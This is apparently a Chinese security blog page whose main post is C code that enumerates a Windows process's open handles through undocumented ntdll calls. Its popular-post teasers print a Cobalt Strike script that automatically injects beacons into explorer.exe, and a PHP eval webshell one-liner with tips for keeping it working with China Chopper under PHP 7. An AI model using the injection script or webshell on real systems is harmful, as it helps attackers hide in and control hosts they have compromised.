枚举进程所有文件句柄

    代码来自Enumerating opened handles from a process,改了几个小bug
    
#ifndef UNICODE
#define UNICODE
#endif

#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
 

#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004

#define SystemHandleInformation 16
#define ObjectBasicInformation 0
#define ObjectNameInformation 1
#define ObjectTypeInformation 2

typedef NTSTATUS(NTAPI *_NtQuerySystemInformation)(
 ULONG SystemInformationClass,
 PVOID SystemInformation,
 ULONG SystemInformationLength,
 PULONG ReturnLength
 );
typedef NTSTATUS(NTAPI *_NtDuplicateObject)(
 HANDLE SourceProcessHandle,
 HANDLE SourceHandle,
 HANDLE TargetProcessHandle,
 PHANDLE TargetHandle,
 ACCESS_MASK DesiredAccess,
 ULONG Attributes,
 ULONG Options
 );
typedef NTSTATUS(NTAPI *_NtQueryObject)(
 HANDLE ObjectHandle,
 ULONG ObjectInformationClass,
 PVOID ObjectInformation,
 ULONG ObjectInformationLength,
 PULONG ReturnLength
 );

typedef struct _UNICODE_STRING {
 USHORT Length;
 USHORT MaximumLength;
 PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _SYSTEM_HANDLE {
 ULONG ProcessId;
 BYTE ObjectTypeNumber;
 BYTE Flags;
 USHORT Handle;
 PVOID Object;
 ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION {
 ULONG HandleCount;
 SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef enum _POOL_TYPE {
 NonPagedPool,
 PagedPool,
 NonPagedPoolMustSucceed,
 DontUseThisType,
 NonPagedPoolCacheAligned,
 PagedPoolCacheAligned,
 NonPagedPoolCacheAlignedMustS
} POOL_TYPE, *PPOOL_TYPE;

typedef struct _OBJECT_TYPE_INFORMATION {
 UNICODE_STRING Name;
 ULONG TotalNumberOfObjects;
 ULONG TotalNumberOfHandles;
 ULONG TotalPagedPoolUsage;
 ULONG TotalNonPagedPoolUsage;
 ULONG TotalNamePoolUsage;
 ULONG TotalHandleTableUsage;
 ULONG HighWaterNumberOfObjects;
 ULONG HighWaterNumberOfHandles;
 ULONG HighWaterPagedPoolUsage;
 ULONG HighWaterNonPagedPoolUsage;
 ULONG HighWaterNamePoolUsage;
 ULONG HighWaterHandleTableUsage;
 ULONG InvalidAttributes;
 GENERIC_MAPPING GenericMapping;
 ULONG ValidAccess;
 BOOLEAN SecurityRequired;
 BOOLEAN MaintainHandleCount;
 USHORT MaintainTypeList;
 POOL_TYPE PoolType;
 ULONG PagedPoolUsage;
 ULONG NonPagedPoolUsage;
} OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION;

PVOID GetLibraryProcAddress(PSTR LibraryName, PSTR ProcName) {
 return GetProcAddress(GetModuleHandleA(LibraryName), ProcName);
}

void ErrorExit(LPTSTR lpszFunction) {
 // Retrieve the system error message for the last-error code

 LPVOID lpMsgBuf;
 LPVOID lpDisplayBuf;
 DWORD dw = GetLastError();

 FormatMessage(
  FORMAT_MESSAGE_ALLOCATE_BUFFER |
  FORMAT_MESSAGE_FROM_SYSTEM |
  FORMAT_MESSAGE_IGNORE_INSERTS,
  NULL,
  dw,
  MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
  (LPTSTR)&lpMsgBuf,
  0, NULL);

 _tprintf((LPTSTR)lpMsgBuf);

 LocalFree(lpMsgBuf);
 LocalFree(lpDisplayBuf);
 ExitProcess(dw);
}

void ShowErr() {
 CHAR errormsg[100];
 FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, GetLastError(), 0, errormsg, sizeof(errormsg), NULL);
 printf("ERROR: %s", errormsg);
}

int wmain(int argc, WCHAR *argv[]) {

 _NtQuerySystemInformation NtQuerySystemInformation = (_NtQuerySystemInformation)GetLibraryProcAddress("ntdll.dll", "NtQuerySystemInformation");
 _NtDuplicateObject NtDuplicateObject = (_NtDuplicateObject)GetLibraryProcAddress("ntdll.dll", "NtDuplicateObject");
 _NtQueryObject NtQueryObject = (_NtQueryObject)GetLibraryProcAddress("ntdll.dll", "NtQueryObject");

 NTSTATUS status;
 PSYSTEM_HANDLE_INFORMATION handleInfo;
 ULONG handleInfoSize = 0x10000;
 ULONG pid;
 HANDLE processHandle;
 ULONG i;

 if (argc < 2) {
  printf("Usage: handles [pid]\n");
  return 1;
 }

 pid = _wtoi(argv[1]);

 if (!(processHandle = OpenProcess(PROCESS_DUP_HANDLE, FALSE, pid))) {
  printf("Could not open PID %d! (Don't try to open a system process.)\n", pid);
  return 1;
 }

 handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);

 // NtQuerySystemInformation won't give us the correct buffer size,
 //  so we guess by doubling the buffer size.
 while ((status = NtQuerySystemInformation(
  SystemHandleInformation,
  handleInfo,
  handleInfoSize,
  NULL
  )) == STATUS_INFO_LENGTH_MISMATCH)
  handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);

 // NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
 if (!NT_SUCCESS(status)) {
  printf("NtQuerySystemInformation failed!\n");
  return 1;
 }

 for (i = 0; i < handleInfo->HandleCount; i++) {
  SYSTEM_HANDLE handle = handleInfo->Handles[i];
  HANDLE dupHandle = NULL;
  POBJECT_TYPE_INFORMATION objectTypeInfo;
  PVOID objectNameInfo;
  UNICODE_STRING objectName;
  ULONG returnLength;

  // Check if this handle belongs to the PID the user specified.
  if (handle.ProcessId != pid)
   continue;

  // Duplicate the handle so we can query it.
  if (!NT_SUCCESS(NtDuplicateObject(
   processHandle,
   (void*)handle.Handle,
   GetCurrentProcess(),
   &dupHandle,
   0,
   0,
   0
   ))) {

   printf("[%#x] Error!\n", handle.Handle);
   continue;
  }

  // Query the object type.
  objectTypeInfo = (POBJECT_TYPE_INFORMATION)malloc(0x1000);
  if (!NT_SUCCESS(NtQueryObject(
   dupHandle,
   ObjectTypeInformation,
   objectTypeInfo,
   0x1000,
   NULL
   ))) {

   printf("[%#x] Error!\n", handle.Handle);
   CloseHandle(dupHandle);
   continue;
  }

  // Query the object name (unless it has an access of
  //   0x0012019f, on which NtQueryObject could hang.
  if (handle.GrantedAccess == 0x0012019f) {

   // We have the type, so display that.
   printf(
    "[%#x] %.*S: (did not get name)\n",
    handle.Handle,
    objectTypeInfo->Name.Length / 2,
    objectTypeInfo->Name.Buffer
    );

   free(objectTypeInfo);
   CloseHandle(dupHandle);
   continue;
  }

  objectNameInfo = malloc(0x1000);
  if (!NT_SUCCESS(NtQueryObject(
   dupHandle,
   ObjectNameInformation,
   objectNameInfo,
   0x1000,
   &returnLength
   ))) {

   // Reallocate the buffer and try again.
   objectNameInfo = realloc(objectNameInfo, returnLength);
   if (!NT_SUCCESS(NtQueryObject(
    dupHandle,
    ObjectNameInformation,
    objectNameInfo,
    returnLength,
    NULL
    ))) {

    // We have the type name, so just display that.
    printf(
     "[%#x] %.*S: (could not get name)\n",
     handle.Handle,
     objectTypeInfo->Name.Length / 2,
     objectTypeInfo->Name.Buffer
     );

    free(objectTypeInfo);
    free(objectNameInfo);
    CloseHandle(dupHandle);
    continue;
   }
  }

  // Cast our buffer into an UNICODE_STRING.
  objectName = *(PUNICODE_STRING)objectNameInfo;

  // Print the information!
  if (objectName.Length)
  {
   // The object has a name.
   printf(
    "[%#x] %.*S: %.*S\n",
    handle.Handle,
    objectTypeInfo->Name.Length / 2,
    objectTypeInfo->Name.Buffer,
    objectName.Length / 2,
    objectName.Buffer
    );
  }
  else {
   // Print something else.
   printf(
    "[%#x] %.*S: (unnamed)\n",
    handle.Handle,
    objectTypeInfo->Name.Length / 2,
    objectTypeInfo->Name.Buffer
    );
  }

  free(objectTypeInfo);
  free(objectNameInfo);
  CloseHandle(dupHandle);
 }

 free(handleInfo);
 CloseHandle(processHandle);

 return 0;
}

评论

发表评论

此博客中的热门博文

Cobalt Strike automigrate自动迁移进程脚本

    metasploit有个功能叫auto migrate 可以自动把meterpreter移动到其他进程,不过Cobalt Strike却没有这个功能,在网上搜到一个移动到进程id的aggressor脚本,不过用了下发现有问题,另外如果只是想移动到指定id的进程的话还不如用Cobalt Strike自带的inject命令。遂想自己写个脚本,实现beacon上线后自动注入到指定进程名,还能根据当前的beacon所在的进程是32位还是64位来自动选择binject的注入类型。     先贴下写好的脚本内容: on beacon_initial { sub callback { $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+'; $listener = "test"; if ($2 ismatch $regex) { $pid = matched()[1]; $inject_pid = $pid; if (-is64 $1) { $arch = "x64"; } else { $arch = "x86"; } binject($1, $pid, $listener, $arch); } } if($inject_pid != beacon_info($1,"pid")) { bps($1, &callback); } }     脚本不难,讲下编写过程中遇到的几个坑:     1、正则表达式的编写     bps返回的进程列表大致如下:     sppsvc.exe 648 368     svchost.exe 648 444     WmiPrvSE.exe 788 1596     msdtc.exe 648 2740     .....     在写正则表达式的时候以为上面的进程列表每行字符串分割是空格,结果发现是tab(\t),另外每行是以\n来换行的,而且正则表达式的字符串要用单引号包裹,用双引号发现怎么都匹配不上。     2、不停注入的问题     当
阅读全文

菜刀连接php一句话木马返回200的原因及解决方法

图片
    一句话木马的内容为“<?php @eval($_POST["abc"])?>”,用菜刀连接直接返回200          可是hackbar中执行命令却没有问题          很奇怪。后来在看雪上看到也有人发类似的 帖子 ,评论有人提到是php7版本过高的问题,搜了下确实是这样,php manual 中提到: Dynamic calls for certain functions have been forbidden (in the form of $func() or array_map('extract', ...), etc). These functions either inspect or modify another scope, and present with them ambiguous and unreliable behavior. The functions are as follows: assert() - with a string as the first argument      即php7中动态调用一些函数是被禁止的,比如在array_map中调用assert,否则会提示      Warning: Cannot call func_num_args() dynamically in %s on line %d     把一句话里的@符号去掉,则同样会报错“Cannot call assert() with string argument dynamically in ...shell.php(1) : eval()'d code on line 1 ”。       从返回内容可以看到php版本为7.1.6。抓包看了下菜刀的发包,的确用到了array_map("assert"..)          所以只要在菜刀的配置文件里把  array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."
阅读全文

vultr安装kali linux 折腾手记

图片
    打算在vultr上安装kali linux 2017.1 64位,可是安装完重启后kali又进入了安装界面,后来查到网上说系统安装到“finish the installation”这步时,移除ISO文件,避免再次从光盘启动,可是移除ISO重启后一直卡在启动界面,黑屏并提示“booting from disk”,重新安装多少次都无效。     一度怀疑kali 没有成功安装grub。搜索发现 How to set NOMODESET and other kernel boot options in grub2  提到最新的linux把视频模式集成到了内核中,但是一些视频卡有问题会导致黑屏,解决方式就是添加nomodeset参数让内核不去加载视频驱动而是使用bios模式直到X驱动加载完,也提到可以启动时按“e”来编辑grub配置。  The newest kernels have moved the video mode setting into the kernel. So all the programming of the hardware specific clock rates and registers on the video card happen in the kernel rather than in the X driver when the X server starts.. This makes it possible to have high resolution nice looking splash (boot) screens and flicker free transitions from boot splash to login screen. Unfortunately, on some cards this doesnt work properly and you end up with a black screen. Adding the nomodeset parameter instructs the kernel to not load video drivers and use BIOS modes instead until X is loaded.      可是不知道是不是我的姿势不对,我按“
阅读全文